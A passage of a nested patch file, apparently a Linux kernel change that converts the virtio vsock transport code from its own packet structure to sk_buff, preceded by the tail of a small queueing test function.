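
	send_work(&q, 2);	/* sends 1 and 2, requeues 3 */
	send_work(&q, 2);	/* sends 3 */
	return 0;
}
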
+diff --git a/net/vmw_vsock/virtio_transport_common.c b/net/vmw_vsock/virtio_transport_common.c
+index a9980e9b93040..79e79fd6efd19 100644
+--- a/net/vmw_vsock/virtio_transport_common.c
++++ b/net/vmw_vsock/virtio_transport_common.c
+@@ -37,53 +37,58 @@ virtio_transport_get_ops(struct vsock_sock *vsk)
+ 	return container_of(t, struct virtio_transport, transport);
+ }
+ 
+-static struct virtio_vsock_pkt *
+-virtio_transport_alloc_pkt(struct virtio_vsock_pkt_info *info,
++/* Returns a new packet on success, otherwise returns NULL.
++ *
++ * If NULL is returned, the skb allocation or the payload copy failed.
++ */
++static struct sk_buff *
++virtio_transport_alloc_skb(struct virtio_vsock_pkt_info *info,
+ 			   size_t len,
+ 			   u32 src_cid,
+ 			   u32 src_port,
+ 			   u32 dst_cid,
+ 			   u32 dst_port)
+ {
+-	struct virtio_vsock_pkt *pkt;
++	const size_t skb_len = VIRTIO_VSOCK_SKB_HEADROOM + len;
++	struct virtio_vsock_hdr *hdr;
++	struct sk_buff *skb;
++	void *payload;
+ 	int err;
+ 
+-	pkt = kzalloc(sizeof(*pkt), GFP_KERNEL);
+-	if (!pkt)
++	skb = virtio_vsock_alloc_skb(skb_len, GFP_KERNEL);
++	if (!skb)
+ 		return NULL;
+ 
+-	pkt->hdr.type		= cpu_to_le16(info->type);
+-	pkt->hdr.op		= cpu_to_le16(info->op);
+-	pkt->hdr.src_cid	= cpu_to_le64(src_cid);
+-	pkt->hdr.dst_cid	= cpu_to_le64(dst_cid);
+-	pkt->hdr.src_port	= cpu_to_le32(src_port);
+-	pkt->hdr.dst_port	= cpu_to_le32(dst_port);
+-	pkt->hdr.flags		= cpu_to_le32(info->flags);
+-	pkt->len		= len;
+-	pkt->hdr.len		= cpu_to_le32(len);
+-	pkt->reply		= info->reply;
+-	pkt->vsk		= info->vsk;
++	hdr = virtio_vsock_hdr(skb);
++	hdr->type	= cpu_to_le16(info->type);
++	hdr->op		= cpu_to_le16(info->op);
++	hdr->src_cid	= cpu_to_le64(src_cid);
++	hdr->dst_cid	= cpu_to_le64(dst_cid);
++	hdr->src_port	= cpu_to_le32(src_port);
++	hdr->dst_port	= cpu_to_le32(dst_port);
++	hdr->flags	= cpu_to_le32(info->flags);
++	hdr->len	= cpu_to_le32(len);
++	hdr->buf_alloc	= cpu_to_le32(0);
++	hdr->fwd_cnt	= cpu_to_le32(0);
+ 
+ 	if (info->msg && len > 0) {
+-		pkt->buf = kmalloc(len, GFP_KERNEL);
+-		if (!pkt->buf)
+-			goto out_pkt;
+-
+-		pkt->buf_len = len;
+-
+-		err = memcpy_from_msg(pkt->buf, info->msg, len);
++		payload = skb_put(skb, len);
++		err = memcpy_from_msg(payload, info->msg, len);
+ 		if (err)
+ 			goto out;
+ 
+ 		if (msg_data_left(info->msg) == 0 &&
+ 		    info->type == VIRTIO_VSOCK_TYPE_SEQPACKET) {
+-			pkt->hdr.flags |= cpu_to_le32(VIRTIO_VSOCK_SEQ_EOM);
++			hdr->flags |= cpu_to_le32(VIRTIO_VSOCK_SEQ_EOM);
+ 
+ 			if (info->msg->msg_flags & MSG_EOR)
+-				pkt->hdr.flags |= cpu_to_le32(VIRTIO_VSOCK_SEQ_EOR);
++				hdr->flags |= cpu_to_le32(VIRTIO_VSOCK_SEQ_EOR);
+ 		}
+ 	}
+ 
++	if (info->reply)
++		virtio_vsock_skb_set_reply(skb);
++
+ 	trace_virtio_transport_alloc_pkt(src_cid, src_port,
+ 					 dst_cid, dst_port,
+ 					 len,
+@@ -91,19 +96,23 @@ virtio_transport_alloc_pkt(struct virtio_vsock_pkt_info *info,
+ 					 info->op,
+ 					 info->flags);
+ 
+-	return pkt;
++	if (info->vsk && !skb_set_owner_sk_safe(skb, sk_vsock(info->vsk))) {
++		WARN_ONCE(1, "failed to allocate skb on vsock socket with sk_refcnt == 0\n");
++		goto out;
++	}
++
++	return skb;
+ 
+ out:
+-	kfree(pkt->buf);
+-out_pkt:
+-	kfree(pkt);
++	kfree_skb(skb);
+ 	return NULL;
+ }
+ 
+ /* Packet capture */
+ static struct sk_buff *virtio_transport_build_skb(void *opaque)
+ {
+-	struct virtio_vsock_pkt *pkt = opaque;
++	struct virtio_vsock_hdr *pkt_hdr;
++	struct sk_buff *pkt = opaque;
+ 	struct af_vsockmon_hdr *hdr;
+ 	struct sk_buff *skb;
+ 	size_t payload_len;
+@@ -113,10 +122,11 @@ static struct sk_buff *virtio_transport_build_skb(void *opaque)
+ 	 * the payload length from the header and the buffer pointer taking
+ 	 * care of the offset in the original packet.
+ 	 */
+-	payload_len = le32_to_cpu(pkt->hdr.len);
+-	payload_buf = pkt->buf + pkt->off;
++	pkt_hdr = virtio_vsock_hdr(pkt);
++	payload_len = pkt->len;
++	payload_buf = pkt->data;
+ 
+-	skb = alloc_skb(sizeof(*hdr) + sizeof(pkt->hdr) + payload_len,
++	skb = alloc_skb(sizeof(*hdr) + sizeof(*pkt_hdr) + payload_len,
+ 			GFP_ATOMIC);
+ 	if (!skb)
+ 		return NULL;
+@@ -124,16 +134,16 @@ static struct sk_buff *virtio_transport_build_skb(void *opaque)
+ 	hdr = skb_put(skb, sizeof(*hdr));
+ 
+ 	/* pkt->hdr is little-endian so no need to byteswap here */
+-	hdr->src_cid = pkt->hdr.src_cid;
+-	hdr->src_port = pkt->hdr.src_port;
+-	hdr->dst_cid = pkt->hdr.dst_cid;
+-	hdr->dst_port = pkt->hdr.dst_port;
++	hdr->src_cid = pkt_hdr->src_cid;
++	hdr->src_port = pkt_hdr->src_port;
++	hdr->dst_cid = pkt_hdr->dst_cid;
++	hdr->dst_port = pkt_hdr->dst_port;
+ 
+ 	hdr->transport = cpu_to_le16(AF_VSOCK_TRANSPORT_VIRTIO);
+-	hdr->len = cpu_to_le16(sizeof(pkt->hdr));
++	hdr->len = cpu_to_le16(sizeof(*pkt_hdr));
+ 	memset(hdr->reserved, 0, sizeof(hdr->reserved));
+ 
+-	switch (le16_to_cpu(pkt->hdr.op)) {
++	switch (le16_to_cpu(pkt_hdr->op)) {
+ 	case VIRTIO_VSOCK_OP_REQUEST:
+ 	case VIRTIO_VSOCK_OP_RESPONSE:
+ 		hdr->op = cpu_to_le16(AF_VSOCK_OP_CONNECT);
+@@ -154,7 +164,7 @@ static struct sk_buff *virtio_transport_build_skb(void *opaque)
+ 		break;
+ 	}
+ 
+-	skb_put_data(skb, &pkt->hdr, sizeof(pkt->hdr));
++	skb_put_data(skb, pkt_hdr, sizeof(*pkt_hdr));
+ 
+ 	if (payload_len) {
+ 		skb_put_data(skb, payload_buf, payload_len);
+@@ -163,13 +173,13 @@ static struct sk_buff *virtio_transport_build_skb(void *opaque)
+ 	return skb;
+ }
+ 
+-void virtio_transport_deliver_tap_pkt(struct virtio_vsock_pkt *pkt)
++void virtio_transport_deliver_tap_pkt(struct sk_buff *skb)
+ {
+-	if (pkt->tap_delivered)
++	if (virtio_vsock_skb_tap_delivered(skb))
+ 		return;
+ 
+-	vsock_deliver_tap(virtio_transport_build_skb, pkt);
+-	pkt->tap_delivered = true;
++	vsock_deliver_tap(virtio_transport_build_skb, skb);
++	virtio_vsock_skb_set_tap_delivered(skb);
+ }
+ EXPORT_SYMBOL_GPL(virtio_transport_deliver_tap_pkt);
+ 
+@@ -192,8 +202,8 @@ static int virtio_transport_send_pkt_info(struct vsock_sock *vsk,
+ 	u32 src_cid, src_port, dst_cid, dst_port;
+ 	const struct virtio_transport *t_ops;
+ 	struct virtio_vsock_sock *vvs;
+-	struct virtio_vsock_pkt *pkt;
+ 	u32 pkt_len = info->pkt_len;
++	struct sk_buff *skb;
+ 
+ 	info->type = virtio_transport_get_type(sk_vsock(vsk));
+ 
+@@ -224,42 +234,44 @@ static int virtio_transport_send_pkt_info(struct vsock_sock *vsk,
+ 	if (pkt_len == 0 && info->op == VIRTIO_VSOCK_OP_RW)
+ 		return pkt_len;
+ 
+-	pkt = virtio_transport_alloc_pkt(info, pkt_len,
++	skb = virtio_transport_alloc_skb(info, pkt_len,
+ 					 src_cid, src_port,
+ 					 dst_cid, dst_port);
+-	if (!pkt) {
++	if (!skb) {
+ 		virtio_transport_put_credit(vvs, pkt_len);
+ 		return -ENOMEM;
+ 	}
+ 
+-	virtio_transport_inc_tx_pkt(vvs, pkt);
++	virtio_transport_inc_tx_pkt(vvs, skb);
+ 
+-	return t_ops->send_pkt(pkt);
++	return t_ops->send_pkt(skb);
+ }
+ 
+ static bool virtio_transport_inc_rx_pkt(struct virtio_vsock_sock *vvs,
+-					struct virtio_vsock_pkt *pkt)
++					u32 len)
+ {
+-	if (vvs->rx_bytes + pkt->len > vvs->buf_alloc)
++	if (vvs->rx_bytes + len > vvs->buf_alloc)
+ 		return false;
+ 
+-	vvs->rx_bytes += pkt->len;
++	vvs->rx_bytes += len;
+ 	return true;
+ }
+ 
+ static void virtio_transport_dec_rx_pkt(struct virtio_vsock_sock *vvs,
+-					struct virtio_vsock_pkt *pkt)
++					u32 len)
+ {
+-	vvs->rx_bytes -= pkt->len;
+-	vvs->fwd_cnt += pkt->len;
++	vvs->rx_bytes -= len;
++	vvs->fwd_cnt += len;
+ }
+ 
+-void virtio_transport_inc_tx_pkt(struct virtio_vsock_sock *vvs, struct virtio_vsock_pkt *pkt)
++void virtio_transport_inc_tx_pkt(struct virtio_vsock_sock *vvs, struct sk_buff *skb)
+ {
++	struct virtio_vsock_hdr *hdr = virtio_vsock_hdr(skb);
++
+ 	spin_lock_bh(&vvs->rx_lock);
+ 	vvs->last_fwd_cnt = vvs->fwd_cnt;
+-	pkt->hdr.fwd_cnt = cpu_to_le32(vvs->fwd_cnt);
+-	pkt->hdr.buf_alloc = cpu_to_le32(vvs->buf_alloc);
++	hdr->fwd_cnt = cpu_to_le32(vvs->fwd_cnt);
++	hdr->buf_alloc = cpu_to_le32(vvs->buf_alloc);
+ 	spin_unlock_bh(&vvs->rx_lock);
+ }
+ EXPORT_SYMBOL_GPL(virtio_transport_inc_tx_pkt);
+@@ -303,29 +315,29 @@ virtio_transport_stream_do_peek(struct vsock_sock *vsk,
+ 				size_t len)
+ {
+ 	struct virtio_vsock_sock *vvs = vsk->trans;
+-	struct virtio_vsock_pkt *pkt;
+ 	size_t bytes, total = 0, off;
++	struct sk_buff *skb, *tmp;
+ 	int err = -EFAULT;
+ 
+ 	spin_lock_bh(&vvs->rx_lock);
+ 
+-	list_for_each_entry(pkt, &vvs->rx_queue, list) {
+-		off = pkt->off;
++	skb_queue_walk_safe(&vvs->rx_queue, skb,  tmp) {
++		off = 0;
+ 
+ 		if (total == len)
+ 			break;
+ 
+-		while (total < len && off < pkt->len) {
++		while (total < len && off < skb->len) {
+ 			bytes = len - total;
+-			if (bytes > pkt->len - off)
+-				bytes = pkt->len - off;
++			if (bytes > skb->len - off)
++				bytes = skb->len - off;
+ 
+ 			/* sk_lock is held by caller so no one else can dequeue.
+ 			 * Unlock rx_lock since memcpy_to_msg() may sleep.
+ 			 */
+ 			spin_unlock_bh(&vvs->rx_lock);
+ 
+-			err = memcpy_to_msg(msg, pkt->buf + off, bytes);
++			err = memcpy_to_msg(msg, skb->data + off, bytes);
+ 			if (err)
+ 				goto out;
+ 
+@@ -352,37 +364,39 @@ virtio_transport_stream_do_dequeue(struct vsock_sock *vsk,
+ 				   size_t len)
+ {
+ 	struct virtio_vsock_sock *vvs = vsk->trans;
+-	struct virtio_vsock_pkt *pkt;
+ 	size_t bytes, total = 0;
+-	u32 free_space;
++	struct sk_buff *skb;
+ 	int err = -EFAULT;
++	u32 free_space;
+ 
+ 	spin_lock_bh(&vvs->rx_lock);
+-	while (total < len && !list_empty(&vvs->rx_queue)) {
+-		pkt = list_first_entry(&vvs->rx_queue,
+-				       struct virtio_vsock_pkt, list);
++	while (total < len && !skb_queue_empty(&vvs->rx_queue)) {
++		skb = skb_peek(&vvs->rx_queue);
+ 
+ 		bytes = len - total;
+-		if (bytes > pkt->len - pkt->off)
+-			bytes = pkt->len - pkt->off;
++		if (bytes > skb->len)
++			bytes = skb->len;
+ 
+ 		/* sk_lock is held by caller so no one else can dequeue.
+ 		 * Unlock rx_lock since memcpy_to_msg() may sleep.
+ 		 */
+ 		spin_unlock_bh(&vvs->rx_lock);
+ 
+-		err = memcpy_to_msg(msg, pkt->buf + pkt->off, bytes);
++		err = memcpy_to_msg(msg, skb->data, bytes);
+ 		if (err)
+ 			goto out;
+ 
+ 		spin_lock_bh(&vvs->rx_lock);
+ 
+ 		total += bytes;
+-		pkt->off += bytes;
+-		if (pkt->off == pkt->len) {
+-			virtio_transport_dec_rx_pkt(vvs, pkt);
+-			list_del(&pkt->list);
+-			virtio_transport_free_pkt(pkt);
++		skb_pull(skb, bytes);
++
++		if (skb->len == 0) {
++			u32 pkt_len = le32_to_cpu(virtio_vsock_hdr(skb)->len);
++
++			virtio_transport_dec_rx_pkt(vvs, pkt_len);
++			__skb_unlink(skb, &vvs->rx_queue);
++			consume_skb(skb);
+ 		}
+ 	}
+ 
+@@ -414,10 +428,10 @@ static int virtio_transport_seqpacket_do_dequeue(struct vsock_sock *vsk,
+ 						 int flags)
+ {
+ 	struct virtio_vsock_sock *vvs = vsk->trans;
+-	struct virtio_vsock_pkt *pkt;
+ 	int dequeued_len = 0;
+ 	size_t user_buf_len = msg_data_left(msg);
+ 	bool msg_ready = false;
++	struct sk_buff *skb;
+ 
+ 	spin_lock_bh(&vvs->rx_lock);
+ 
+@@ -427,13 +441,18 @@ static int virtio_transport_seqpacket_do_dequeue(struct vsock_sock *vsk,
+ 	}
+ 
+ 	while (!msg_ready) {
+-		pkt = list_first_entry(&vvs->rx_queue, struct virtio_vsock_pkt, list);
++		struct virtio_vsock_hdr *hdr;
++		size_t pkt_len;
++
++		skb = __skb_dequeue(&vvs->rx_queue);
++		if (!skb)
++			break;
++		hdr = virtio_vsock_hdr(skb);
++		pkt_len = (size_t)le32_to_cpu(hdr->len);
+ 
+ 		if (dequeued_len >= 0) {
+-			size_t pkt_len;
+ 			size_t bytes_to_copy;
+ 
+-			pkt_len = (size_t)le32_to_cpu(pkt->hdr.len);
+ 			bytes_to_copy = min(user_buf_len, pkt_len);
+ 
+ 			if (bytes_to_copy) {
+@@ -444,7 +463,7 @@ static int virtio_transport_seqpacket_do_dequeue(struct vsock_sock *vsk,
+ 				 */
+ 				spin_unlock_bh(&vvs->rx_lock);
+ 
+-				err = memcpy_to_msg(msg, pkt->buf, bytes_to_copy);
++				err = memcpy_to_msg(msg, skb->data, bytes_to_copy);
+ 				if (err) {
+ 					/* Copy of message failed. Rest of
+ 					 * fragments will be freed without copy.
+@@ -461,17 +480,16 @@ static int virtio_transport_seqpacket_do_dequeue(struct vsock_sock *vsk,
+ 				dequeued_len += pkt_len;
+ 		}
+ 
+-		if (le32_to_cpu(pkt->hdr.flags) & VIRTIO_VSOCK_SEQ_EOM) {
++		if (le32_to_cpu(hdr->flags) & VIRTIO_VSOCK_SEQ_EOM) {
+ 			msg_ready = true;
+ 			vvs->msg_count--;
+ 
+-			if (le32_to_cpu(pkt->hdr.flags) & VIRTIO_VSOCK_SEQ_EOR)
++			if (le32_to_cpu(hdr->flags) & VIRTIO_VSOCK_SEQ_EOR)
+ 				msg->msg_flags |= MSG_EOR;
+ 		}
+ 
+-		virtio_transport_dec_rx_pkt(vvs, pkt);
+-		list_del(&pkt->list);
+-		virtio_transport_free_pkt(pkt);
++		virtio_transport_dec_rx_pkt(vvs, pkt_len);
++		kfree_skb(skb);
+ 	}
+ 
+ 	spin_unlock_bh(&vvs->rx_lock);
+@@ -609,7 +627,7 @@ int virtio_transport_do_socket_init(struct vsock_sock *vsk,
+ 
+ 	spin_lock_init(&vvs->rx_lock);
+ 	spin_lock_init(&vvs->tx_lock);
+-	INIT_LIST_HEAD(&vvs->rx_queue);
++	skb_queue_head_init(&vvs->rx_queue);
+ 
+ 	return 0;
+ }
+@@ -806,16 +824,16 @@ void virtio_transport_destruct(struct vsock_sock *vsk)
+ EXPORT_SYMBOL_GPL(virtio_transport_destruct);
+ 
+ static int virtio_transport_reset(struct vsock_sock *vsk,
+-				  struct virtio_vsock_pkt *pkt)
++				  struct sk_buff *skb)
+ {
+ 	struct virtio_vsock_pkt_info info = {
+ 		.op = VIRTIO_VSOCK_OP_RST,
+-		.reply = !!pkt,
++		.reply = !!skb,
+ 		.vsk = vsk,
+ 	};
+ 
+ 	/* Send RST only if the original pkt is not a RST pkt */
+-	if (pkt && le16_to_cpu(pkt->hdr.op) == VIRTIO_VSOCK_OP_RST)
++	if (skb && le16_to_cpu(virtio_vsock_hdr(skb)->op) == VIRTIO_VSOCK_OP_RST)
+ 		return 0;
+ 
+ 	return virtio_transport_send_pkt_info(vsk, &info);
+@@ -825,29 +843,30 @@ static int virtio_transport_reset(struct vsock_sock *vsk,
+  * attempt was made to connect to a socket that does not exist.
+  */
+ static int virtio_transport_reset_no_sock(const struct virtio_transport *t,
+-					  struct virtio_vsock_pkt *pkt)
++					  struct sk_buff *skb)
+ {
+-	struct virtio_vsock_pkt *reply;
++	struct virtio_vsock_hdr *hdr = virtio_vsock_hdr(skb);
+ 	struct virtio_vsock_pkt_info info = {
+ 		.op = VIRTIO_VSOCK_OP_RST,
+-		.type = le16_to_cpu(pkt->hdr.type),
++		.type = le16_to_cpu(hdr->type),
+ 		.reply = true,
+ 	};
++	struct sk_buff *reply;
+ 
+ 	/* Send RST only if the original pkt is not a RST pkt */
+-	if (le16_to_cpu(pkt->hdr.op) == VIRTIO_VSOCK_OP_RST)
++	if (le16_to_cpu(hdr->op) == VIRTIO_VSOCK_OP_RST)
+ 		return 0;
+ 
+-	reply = virtio_transport_alloc_pkt(&info, 0,
+-					   le64_to_cpu(pkt->hdr.dst_cid),
+-					   le32_to_cpu(pkt->hdr.dst_port),
+-					   le64_to_cpu(pkt->hdr.src_cid),
+-					   le32_to_cpu(pkt->hdr.src_port));
++	reply = virtio_transport_alloc_skb(&info, 0,
++					   le64_to_cpu(hdr->dst_cid),
++					   le32_to_cpu(hdr->dst_port),
++					   le64_to_cpu(hdr->src_cid),
++					   le32_to_cpu(hdr->src_port));
+ 	if (!reply)
+ 		return -ENOMEM;
+ 
+ 	if (!t) {
+-		virtio_transport_free_pkt(reply);
++		kfree_skb(reply);
+ 		return -ENOTCONN;
+ 	}
+ 
+@@ -858,16 +877,11 @@ static int virtio_transport_reset_no_sock(const struct virtio_transport *t,
+ static void virtio_transport_remove_sock(struct vsock_sock *vsk)
+ {
+ 	struct virtio_vsock_sock *vvs = vsk->trans;
+-	struct virtio_vsock_pkt *pkt, *tmp;
+ 
+ 	/* We don't need to take rx_lock, as the socket is closing and we are
+ 	 * removing it.
+ 	 */
+-	list_for_each_entry_safe(pkt, tmp, &vvs->rx_queue, list) {
+-		list_del(&pkt->list);
+-		virtio_transport_free_pkt(pkt);
+-	}
+-
++	__skb_queue_purge(&vvs->rx_queue);
+ 	vsock_remove_sock(vsk);
+ }
+ 
+@@ -981,13 +995,14 @@ EXPORT_SYMBOL_GPL(virtio_transport_release);
+ 
+ static int
+ virtio_transport_recv_connecting(struct sock *sk,
+-				 struct virtio_vsock_pkt *pkt)
++				 struct sk_buff *skb)
+ {
++	struct virtio_vsock_hdr *hdr = virtio_vsock_hdr(skb);
+ 	struct vsock_sock *vsk = vsock_sk(sk);
+-	int err;
+ 	int skerr;
++	int err;
+ 
+-	switch (le16_to_cpu(pkt->hdr.op)) {
++	switch (le16_to_cpu(hdr->op)) {
+ 	case VIRTIO_VSOCK_OP_RESPONSE:
+ 		sk->sk_state = TCP_ESTABLISHED;
+ 		sk->sk_socket->state = SS_CONNECTED;
+@@ -1008,7 +1023,7 @@ virtio_transport_recv_connecting(struct sock *sk,
+ 	return 0;
+ 
+ destroy:
+-	virtio_transport_reset(vsk, pkt);
++	virtio_transport_reset(vsk, skb);
+ 	sk->sk_state = TCP_CLOSE;
+ 	sk->sk_err = skerr;
+ 	sk_error_report(sk);
+@@ -1017,34 +1032,37 @@ destroy:
+ 
+ static void
+ virtio_transport_recv_enqueue(struct vsock_sock *vsk,
+-			      struct virtio_vsock_pkt *pkt)
++			      struct sk_buff *skb)
+ {
+ 	struct virtio_vsock_sock *vvs = vsk->trans;
+ 	bool can_enqueue, free_pkt = false;
++	struct virtio_vsock_hdr *hdr;
++	u32 len;
+ 
+-	pkt->len = le32_to_cpu(pkt->hdr.len);
+-	pkt->off = 0;
++	hdr = virtio_vsock_hdr(skb);
++	len = le32_to_cpu(hdr->len);
+ 
+ 	spin_lock_bh(&vvs->rx_lock);
+ 
+-	can_enqueue = virtio_transport_inc_rx_pkt(vvs, pkt);
++	can_enqueue = virtio_transport_inc_rx_pkt(vvs, len);
+ 	if (!can_enqueue) {
+ 		free_pkt = true;
+ 		goto out;
+ 	}
+ 
+-	if (le32_to_cpu(pkt->hdr.flags) & VIRTIO_VSOCK_SEQ_EOM)
++	if (le32_to_cpu(hdr->flags) & VIRTIO_VSOCK_SEQ_EOM)
+ 		vvs->msg_count++;
+ 
+ 	/* Try to copy small packets into the buffer of last packet queued,
+ 	 * to avoid wasting memory queueing the entire buffer with a small
+ 	 * payload.
+ 	 */
+-	if (pkt->len <= GOOD_COPY_LEN && !list_empty(&vvs->rx_queue)) {
+-		struct virtio_vsock_pkt *last_pkt;
++	if (len <= GOOD_COPY_LEN && !skb_queue_empty(&vvs->rx_queue)) {
++		struct virtio_vsock_hdr *last_hdr;
++		struct sk_buff *last_skb;
+ 
+-		last_pkt = list_last_entry(&vvs->rx_queue,
+-					   struct virtio_vsock_pkt, list);
++		last_skb = skb_peek_tail(&vvs->rx_queue);
++		last_hdr = virtio_vsock_hdr(last_skb);
+ 
+ 		/* If there is space in the last packet queued, we copy the
+ 		 * new packet in its buffer. We avoid this if the last packet
+@@ -1052,35 +1070,35 @@ virtio_transport_recv_enqueue(struct vsock_sock *vsk,
+ 		 * delimiter of SEQPACKET message, so 'pkt' is the first packet
+ 		 * of a new message.
+ 		 */
+-		if ((pkt->len <= last_pkt->buf_len - last_pkt->len) &&
+-		    !(le32_to_cpu(last_pkt->hdr.flags) & VIRTIO_VSOCK_SEQ_EOM)) {
+-			memcpy(last_pkt->buf + last_pkt->len, pkt->buf,
+-			       pkt->len);
+-			last_pkt->len += pkt->len;
++		if (skb->len < skb_tailroom(last_skb) &&
++		    !(le32_to_cpu(last_hdr->flags) & VIRTIO_VSOCK_SEQ_EOM)) {
++			memcpy(skb_put(last_skb, skb->len), skb->data, skb->len);
+ 			free_pkt = true;
+-			last_pkt->hdr.flags |= pkt->hdr.flags;
++			last_hdr->flags |= hdr->flags;
++			le32_add_cpu(&last_hdr->len, len);
+ 			goto out;
+ 		}
+ 	}
+ 
+-	list_add_tail(&pkt->list, &vvs->rx_queue);
++	__skb_queue_tail(&vvs->rx_queue, skb);
+ 
+ out:
+ 	spin_unlock_bh(&vvs->rx_lock);
+ 	if (free_pkt)
+-		virtio_transport_free_pkt(pkt);
++		kfree_skb(skb);
+ }
+ 
+ static int
+ virtio_transport_recv_connected(struct sock *sk,
+-				struct virtio_vsock_pkt *pkt)
++				struct sk_buff *skb)
+ {
++	struct virtio_vsock_hdr *hdr = virtio_vsock_hdr(skb);
+ 	struct vsock_sock *vsk = vsock_sk(sk);
+ 	int err = 0;
+ 
+-	switch (le16_to_cpu(pkt->hdr.op)) {
++	switch (le16_to_cpu(hdr->op)) {
+ 	case VIRTIO_VSOCK_OP_RW:
+-		virtio_transport_recv_enqueue(vsk, pkt);
++		virtio_transport_recv_enqueue(vsk, skb);
+ 		vsock_data_ready(sk);
+ 		return err;
+ 	case VIRTIO_VSOCK_OP_CREDIT_REQUEST:
+@@ -1090,18 +1108,23 @@ virtio_transport_recv_connected(struct sock *sk,
+ 		sk->sk_write_space(sk);
+ 		break;
+ 	case VIRTIO_VSOCK_OP_SHUTDOWN:
+-		if (le32_to_cpu(pkt->hdr.flags) & VIRTIO_VSOCK_SHUTDOWN_RCV)
++		if (le32_to_cpu(hdr->flags) & VIRTIO_VSOCK_SHUTDOWN_RCV)
+ 			vsk->peer_shutdown |= RCV_SHUTDOWN;
+-		if (le32_to_cpu(pkt->hdr.flags) & VIRTIO_VSOCK_SHUTDOWN_SEND)
++		if (le32_to_cpu(hdr->flags) & VIRTIO_VSOCK_SHUTDOWN_SEND)
+ 			vsk->peer_shutdown |= SEND_SHUTDOWN;
+-		if (vsk->peer_shutdown == SHUTDOWN_MASK &&
+-		    vsock_stream_has_data(vsk) <= 0 &&
+-		    !sock_flag(sk, SOCK_DONE)) {
+-			(void)virtio_transport_reset(vsk, NULL);
+-
+-			virtio_transport_do_close(vsk, true);
++		if (vsk->peer_shutdown == SHUTDOWN_MASK) {
++			if (vsock_stream_has_data(vsk) <= 0 && !sock_flag(sk, SOCK_DONE)) {
++				(void)virtio_transport_reset(vsk, NULL);
++				virtio_transport_do_close(vsk, true);
++			}
++			/* Remove this socket anyway because the remote peer sent
++			 * the shutdown. This way a new connection will succeed
++			 * if the remote peer uses the same source port,
++			 * even if the old socket is still unreleased, but now disconnected.
++			 */
++			vsock_remove_sock(vsk);
+ 		}
+-		if (le32_to_cpu(pkt->hdr.flags))
++		if (le32_to_cpu(virtio_vsock_hdr(skb)->flags))
+ 			sk->sk_state_change(sk);
+ 		break;
+ 	case VIRTIO_VSOCK_OP_RST:
+@@ -1112,28 +1135,30 @@ virtio_transport_recv_connected(struct sock *sk,
+ 		break;
+ 	}
+ 
+-	virtio_transport_free_pkt(pkt);
++	kfree_skb(skb);
+ 	return err;
+ }
+ 
+ static void
+ virtio_transport_recv_disconnecting(struct sock *sk,
+-				    struct virtio_vsock_pkt *pkt)
++				    struct sk_buff *skb)
+ {
++	struct virtio_vsock_hdr *hdr = virtio_vsock_hdr(skb);
+ 	struct vsock_sock *vsk = vsock_sk(sk);
+ 
+-	if (le16_to_cpu(pkt->hdr.op) == VIRTIO_VSOCK_OP_RST)
++	if (le16_to_cpu(hdr->op) == VIRTIO_VSOCK_OP_RST)
+ 		virtio_transport_do_close(vsk, true);
+ }
+ 
+ static int
+ virtio_transport_send_response(struct vsock_sock *vsk,
+-			       struct virtio_vsock_pkt *pkt)
++			       struct sk_buff *skb)
+ {
++	struct virtio_vsock_hdr *hdr = virtio_vsock_hdr(skb);
+ 	struct virtio_vsock_pkt_info info = {
+ 		.op = VIRTIO_VSOCK_OP_RESPONSE,
+-		.remote_cid = le64_to_cpu(pkt->hdr.src_cid),
+-		.remote_port = le32_to_cpu(pkt->hdr.src_port),
++		.remote_cid = le64_to_cpu(hdr->src_cid),
++		.remote_port = le32_to_cpu(hdr->src_port),
+ 		.reply = true,
+ 		.vsk = vsk,
+ 	};
+@@ -1142,8 +1167,9 @@ virtio_transport_send_response(struct vsock_sock *vsk,
+ }
+ 
+ static bool virtio_transport_space_update(struct sock *sk,
+-					  struct virtio_vsock_pkt *pkt)
++					  struct sk_buff *skb)
+ {
++	struct virtio_vsock_hdr *hdr = virtio_vsock_hdr(skb);
+ 	struct vsock_sock *vsk = vsock_sk(sk);
+ 	struct virtio_vsock_sock *vvs = vsk->trans;
+ 	bool space_available;
+@@ -1158,8 +1184,8 @@ static bool virtio_transport_space_update(struct sock *sk,
+ 
+ 	/* buf_alloc and fwd_cnt is always included in the hdr */
+ 	spin_lock_bh(&vvs->tx_lock);
+-	vvs->peer_buf_alloc = le32_to_cpu(pkt->hdr.buf_alloc);
+-	vvs->peer_fwd_cnt = le32_to_cpu(pkt->hdr.fwd_cnt);
++	vvs->peer_buf_alloc = le32_to_cpu(hdr->buf_alloc);
++	vvs->peer_fwd_cnt = le32_to_cpu(hdr->fwd_cnt);
+ 	space_available = virtio_transport_has_space(vsk);
+ 	spin_unlock_bh(&vvs->tx_lock);
+ 	return space_available;
+@@ -1167,27 +1193,28 @@ static bool virtio_transport_space_update(struct sock *sk,
+ 
+ /* Handle server socket */
+ static int
+-virtio_transport_recv_listen(struct sock *sk, struct virtio_vsock_pkt *pkt,
++virtio_transport_recv_listen(struct sock *sk, struct sk_buff *skb,
+ 			     struct virtio_transport *t)
+ {
++	struct virtio_vsock_hdr *hdr = virtio_vsock_hdr(skb);
+ 	struct vsock_sock *vsk = vsock_sk(sk);
+ 	struct vsock_sock *vchild;
+ 	struct sock *child;
+ 	int ret;
+ 
+-	if (le16_to_cpu(pkt->hdr.op) != VIRTIO_VSOCK_OP_REQUEST) {
+-		virtio_transport_reset_no_sock(t, pkt);
++	if (le16_to_cpu(hdr->op) != VIRTIO_VSOCK_OP_REQUEST) {
++		virtio_transport_reset_no_sock(t, skb);
+ 		return -EINVAL;
+ 	}
+ 
+ 	if (sk_acceptq_is_full(sk)) {
+-		virtio_transport_reset_no_sock(t, pkt);
++		virtio_transport_reset_no_sock(t, skb);
+ 		return -ENOMEM;
+ 	}
+ 
+ 	child = vsock_create_connected(sk);
+ 	if (!child) {
+-		virtio_transport_reset_no_sock(t, pkt);
++		virtio_transport_reset_no_sock(t, skb);
+ 		return -ENOMEM;
+ 	}
+ 
+@@ -1198,10 +1225,10 @@ virtio_transport_recv_listen(struct sock *sk, struct virtio_vsock_pkt *pkt,
+ 	child->sk_state = TCP_ESTABLISHED;
+ 
+ 	vchild = vsock_sk(child);
+-	vsock_addr_init(&vchild->local_addr, le64_to_cpu(pkt->hdr.dst_cid),
+-			le32_to_cpu(pkt->hdr.dst_port));
+-	vsock_addr_init(&vchild->remote_addr, le64_to_cpu(pkt->hdr.src_cid),
+-			le32_to_cpu(pkt->hdr.src_port));
++	vsock_addr_init(&vchild->local_addr, le64_to_cpu(hdr->dst_cid),
++			le32_to_cpu(hdr->dst_port));
